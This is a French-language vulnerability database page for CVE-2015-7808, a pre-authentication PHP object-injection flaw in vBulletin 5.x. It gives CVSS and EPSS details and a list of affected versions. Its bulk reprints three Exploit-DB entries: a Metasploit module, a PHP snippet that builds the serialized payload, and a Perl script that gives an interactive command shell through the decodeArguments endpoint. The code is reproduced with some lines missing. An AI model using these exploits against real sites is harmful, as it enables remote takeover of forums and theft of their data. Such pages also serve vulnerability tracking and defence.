Faiblesses connexes
Nom de la faiblesse |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.5 |
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 48761
Date de publication : 2017-07-23 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : No
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',
'Description' => %q{
This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
'Platform' => 'php',
'License' => MSF_LICENSE,
'Author' => [
'Netanel Rubin', # reported by
'cutz', # original exploit
'Julien (jvoisin) Voisin', # metasploit module
'Payload' =>
'BadChars' => "\x22",
'References' =>
['CVE', '2015-7808'],
['EDB', '38629'],
['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
'Arch' => ARCH_PHP,
'Targets' => [
[ 'Automatic Targeting', { 'auto' => true } ],
['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
'DisclosureDate' => 'Nov 4 2015',
'DefaultTarget' => 0))
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
def check
res = send_request_cgi({ 'uri' => target_uri.path })
if (res && res.body.include?('vBulletin Solutions, Inc.'))
if res.body.include?("Version 5.0")
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body.include?("Version 5.1")
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Detected
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
def exploit
print_status("Trying to inferprint the instance...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
print_status("Exploiting #{@my_target.name}...")
chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'
chain << @my_target["chain"].length.to_s
chain << ':"'
chain << @my_target["chain"]
chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"
chain = Rex::Text.uri_encode(chain)
chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),
'vars_get' => {
'arguments' => chain
'encode_params' => false,
Exploit Database EDB-ID : 38629
Date de publication : 2015-11-04 23h00 +00:00
Auteur : hhjj
EDB Vérifié : Yes
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE :
# I did not discover this exploit, leaked from the IoT.
# Build the object
php << 'eof'
class vB_Database {
public $functions = array();
public function __construct()
$this->functions['free_result'] = 'phpinfo';
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
$this->db = new vB_Database();
$this->recordset = 1;
print urlencode(serialize(new vB_dB_Result())) . "\n";
#Then hit decodeArguments with your payload :
Exploit Database EDB-ID : 38790
Date de publication : 2015-11-22 23h00 +00:00
Auteur : Mohammad Reza Espargham
EDB Vérifié : Yes
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
if (($source =~ m/4276158464/i))
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
print "\n Target Vulnerable ;)\n";
print "\n\n$user\$ ";
if($cmd =~ m/exit/i){exit 0;}
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
print "\n".$response->decoded_content;
}else{print "\ntarget is not Vulnerable\n\n"}
Products Mentioned
Configuraton 0
Vbulletin>>Vbulletin >> Version 5.0.0
Vbulletin>>Vbulletin >> Version 5.0.1
Vbulletin>>Vbulletin >> Version 5.0.2
Vbulletin>>Vbulletin >> Version 5.0.3
Vbulletin>>Vbulletin >> Version 5.0.4
Vbulletin>>Vbulletin >> Version 5.0.5
Vbulletin>>Vbulletin >> Version 5.1.0
Vbulletin>>Vbulletin >> Version 5.1.0
Vbulletin>>Vbulletin >> Version 5.1.1
Vbulletin>>Vbulletin >> Version 5.1.2
Vbulletin>>Vbulletin >> Version 5.1.2
Vbulletin>>Vbulletin >> Version 5.1.2
Vbulletin>>Vbulletin >> Version 5.1.2
Vbulletin>>Vbulletin >> Version 5.1.3
Vbulletin>>Vbulletin >> Version 5.1.3
Vbulletin>>Vbulletin >> Version 5.1.4
Vbulletin>>Vbulletin >> Version 5.1.5
Vbulletin>>Vbulletin >> Version 5.1.6
Vbulletin>>Vbulletin >> Version 5.1.7
Vbulletin>>Vbulletin >> Version 5.1.8
Vbulletin>>Vbulletin >> Version 5.1.9